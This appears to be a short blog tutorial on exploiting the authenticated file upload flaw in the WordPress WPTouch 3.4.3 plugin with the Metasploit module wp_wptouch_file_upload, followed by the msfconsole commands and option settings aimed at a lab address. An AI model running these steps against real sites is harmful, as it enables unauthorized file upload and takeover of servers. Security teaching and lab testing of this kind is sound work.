Exploit Remote PC using WordPress WordPress WPTouch Authenticated File Upload

The Wordpress WPTouch plugin contains authenticated file upload vulnerability. A wp-nonce (CSRF token) is created on the backend index page and the same token is used on handling ajax file uploads through the plugin. By sending the captured nonce with the upload, we can upload arbitrary files to the upload folder. Because the plugin also uses it's own file upload mechanism instead of the wordpress api it's possible to upload any file type. The user provided does not need special rights, and users with "Contributor" role can be abused.

Exploit Targets
Wp touch 3.4.3

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_wptouch_file_upload
msf exploit (wp_wptouch_file_upload)>set targeturi wordpress
msf exploit (wp_wptouch_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_wptouch_file_upload)>set username admin
msf exploit (wp_wptouch_file_upload)>set password admin123
msf exploit (wp_wptouch_file_upload)>set rport 80
msf exploit (wp_wptouch_file_upload)>exploit     

0 comments:

Post a Comment